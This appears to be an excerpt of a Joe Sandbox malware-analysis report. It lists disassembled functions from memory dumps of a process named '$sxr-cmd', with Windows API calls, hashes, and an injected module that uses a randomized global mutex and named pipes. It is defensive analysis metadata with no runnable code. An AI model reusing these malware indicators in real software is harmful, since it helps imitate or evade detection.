• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
• String ID:
• API String ID: 22757656-0
• Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
• Instruction ID: 493c66bd95201356e4cb2951660dc17c28aa41c687341405ca7b0476d0cfa224
• Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
• Instruction Fuzzy Hash: C511B272A14A458BE7806B24E08837DBAA0FB89B74FA44334D62E073D0CF7DC45D8B20
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138056C5
• RtlFreeHeap.NTDLL(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138056D9
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138056FD
• RtlFreeHeap.NTDLL(?,?,00000028,00007FF713805433,?,?,?,00007FF7138069B8,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF713805711
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
• Instruction ID: cf00cad01ab36e3ef6b66a075ee54e806e4df6f3c591bf4ffc6b9c212680e6b0
• Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
• Instruction Fuzzy Hash: 64112872A04F81CADB019F56E4040ACBBA0F749F94B888135DB4E13718DF38E4AACB60
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
• Instruction ID: 36efa8f06711b38369d8ccd9a0f7667d4c07018563c9cba09fa6183cf9008311
• Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
• Instruction Fuzzy Hash: 1921C335908F4189E780AF14F880369F7A4FB89764F900136DA8D62764EF7EE46CC720
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
• Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
• Instruction ID: c363a19d63f6e9996f30205302280f7524e4412a37066bd33e93f81b384d60d4
• Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
• Instruction Fuzzy Hash: CCF01C31A25E42CFD7846B10E444179FA60FB8AB12F849274DA0B12394DF7DD11D8B20
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
• Instruction ID: d3d4abd078e8d08a883bbede54becaaa110dbc2b2a575260a9055ad6c1863adb
• Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
• Instruction Fuzzy Hash: D071C472200FA4E9EF649E259949BEE6792F7E6789FC00056FE4A43B88DF35C548C740
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137ECD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDA6
  • Part of subcall function 00007FF7137ECD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDBD
• wcschr.MSVCRT ref: 00007FF7138111DC
• memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF71380827A), ref: 00007FF713811277
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocateProcessmemmovewcschr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 4220614737-381716982
• Opcode ID: 4465c0fa31a1beeeb26cedcce685c4bef0802ab666226652cc1f9f3b5947b5db
• Instruction ID: c3fa9f046f3d6908dfc9505e6f26d1558fe890871abfd486005eee228dac8dac
• Opcode Fuzzy Hash: 4465c0fa31a1beeeb26cedcce685c4bef0802ab666226652cc1f9f3b5947b5db
• Instruction Fuzzy Hash: AA71F971A08A4289D7E0EF15A480679F7E4FB987A4FD04235C94E93B94DF3EA459CB30
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06D6
  • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F06F0
  • Part of subcall function 00007FF7137F06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F074D
  • Part of subcall function 00007FF7137F06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7137EB4DB), ref: 00007FF7137F0762
• longjmp.MSVCRT ref: 00007FF7137FCCBC
• longjmp.MSVCRT(?,?,00000000,00007FF7137F1F69,?,?,?,?,?,?,?,00007FF7137E286E,00000000,00000000,00000000,00000000), ref: 00007FF7137FCCE0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
• String ID: GeToken: (%x) '%s'
• API String ID: 3282654869-1994581435
• Opcode ID: 5b3055126f93699daefc779add07b26c723814764b81a484ca01258d4c3fc38c
• Instruction ID: d053e4bebf331e249e82c3fba73cfeaee1d336a879116b118cd9863367116402
• Opcode Fuzzy Hash: 5b3055126f93699daefc779add07b26c723814764b81a484ca01258d4c3fc38c
• Instruction Fuzzy Hash: 7061D461A09E4282FB94AB119490179E294BF49BB4FD44E34CA2E37BD5EE3DE45CC330
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
• Instruction ID: ee4280c032aa6cb4ee40e62a3fd65b66045658d1d079a2e2b548e2038128f8af
• Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
• Instruction Fuzzy Hash: A151F932204FA4E2EE259E29905CBEE6652F7F678AFD40055EE4703B59CF39C4098740
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memmovewcsncmp
• String ID: 0123456789
• API String ID: 3879766669-2793719750
• Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
• Instruction ID: 494506dfc28bcb4a0c1d9eefac3ccff9a789b562ecc3a72a77e22eab3403b3d8
• Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
• Instruction Fuzzy Hash: EE412B61F18F8A89EBA1AF25D8002BAA354FB44BE0F945131CE4E63784DE3DD45EC360
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
• Instruction ID: 0c61de4ea00396ecde54320ebcc6517e578ef15bca519cbb7293546354466d93
• Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
• Instruction Fuzzy Hash: BD41C532316E64E1EF209F25E8587D977A1F3A8798F804021EE4E87798DB3CC545CB40
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7138097D0
                                                                                                              • Part of subcall function 00007FF7137ED3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED46E
                                                                                                              • Part of subcall function 00007FF7137ED3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED485
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED4EE
                                                                                                              • Part of subcall function 00007FF7137ED3F0: iswspace.MSVCRT ref: 00007FF7137ED54D
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED569
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED58C
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7138098D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                            • String ID: Software\Classes
                                                                                                            • API String ID: 2714550308-1656466771
                                                                                                            • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                            • Instruction ID: 39520b6cddd8c362550d21e2c8e715e3fe50095a8fdb4d78a04a2cf0a546154a
                                                                                                            • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                            • Instruction Fuzzy Hash: C6419522A19F5281EB80EB15D485039A3E5FB89BE0F908231DE5D677E1DF3AD469C360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380A0FC
                                                                                                              • Part of subcall function 00007FF7137ED3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED46E
                                                                                                              • Part of subcall function 00007FF7137ED3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7137ED485
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED4EE
                                                                                                              • Part of subcall function 00007FF7137ED3F0: iswspace.MSVCRT ref: 00007FF7137ED54D
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED569
                                                                                                              • Part of subcall function 00007FF7137ED3F0: wcschr.MSVCRT ref: 00007FF7137ED58C
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380A1FB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                            • String ID: Software\Classes
                                                                                                            • API String ID: 2714550308-1656466771
                                                                                                            • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                            • Instruction ID: 3fd2701393cc841413e9bd9b0c8bd28628662ba84274f6f49529215c6ed78c2e
                                                                                                            • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                                                                                                            • Instruction Fuzzy Hash: 12418322A19F5281FB80EB15D444439E3A5FB897E0F908231DE5E677E1DE3ED869C360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleTitle
                                                                                                            • String ID: -
                                                                                                            • API String ID: 3358957663-3695764949
                                                                                                            • Opcode ID: 04e5911cec5ac31099912e2928c40c373e04d3746e7a49c6294d3f0529e6a83a
                                                                                                            • Instruction ID: 6d6c22766f157851e179282fa905d006cddf4f494af12b6dc8f74245fba3444f
                                                                                                            • Opcode Fuzzy Hash: 04e5911cec5ac31099912e2928c40c373e04d3746e7a49c6294d3f0529e6a83a
                                                                                                            • Instruction Fuzzy Hash: 3C31CF21A08A4286EA84BB01A880079EAA4BF4DBB0F954235D91E377D5DF3DE45CC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000002155A5B2A4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction ID: caa439a64c63a557851867e8826366e6bb43f891f65d2c14d2bc5ad739481fa2
                                                                                                            • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                            • Instruction Fuzzy Hash: 2821D336200B68E2EF70CB16A858B9EB392F7E5B99FC50065EE8A43754EF74C449C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmpswscanf
                                                                                                            • String ID: :EOF
                                                                                                            • API String ID: 1534968528-551370653
                                                                                                            • Opcode ID: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                            • Instruction ID: d809dfce2f71f723b20d044913a071886b211260a99436cb14a6e68ddab74a23
                                                                                                            • Opcode Fuzzy Hash: 16430380be0fb913083b6884b205c0f5113cd8b1b31c6669d47242da84fc884d
                                                                                                            • Instruction Fuzzy Hash: 6E316431A0CE8286FB94AB15A880278F2A4FF4DBB0FC45131EA5E66255DF2DE45DC670
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 000002155A5B2B39
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleMutexOpen
                                                                                                            • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                            • API String ID: 3128266590-3670590667
                                                                                                            • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction ID: a2d2b3765d5566fc535deb5481a221b3e67e42b63da4ebb7938c5459fdc5611b
                                                                                                            • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                            • Instruction Fuzzy Hash: 30219532600B68E1EB60DF16B858B9E7396F7E5B59FC440A5EE4A83754DF34C44A8740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                             • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                             • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsnicmp
                                                                                                            • String ID: /-Y
                                                                                                            • API String ID: 1886669725-4274875248
                                                                                                            • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                            • Instruction ID: a4ff5315de984a308d83d7a0f11df5ce07f22c725fa14030701758a880839cec
                                                                                                            • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                            • Instruction Fuzzy Hash: FA217166B08B6585FB90AB069484178F6E1BB48FE0F844131DE88377A4DE3DE49AD320
                                                                                                            Uniqueness

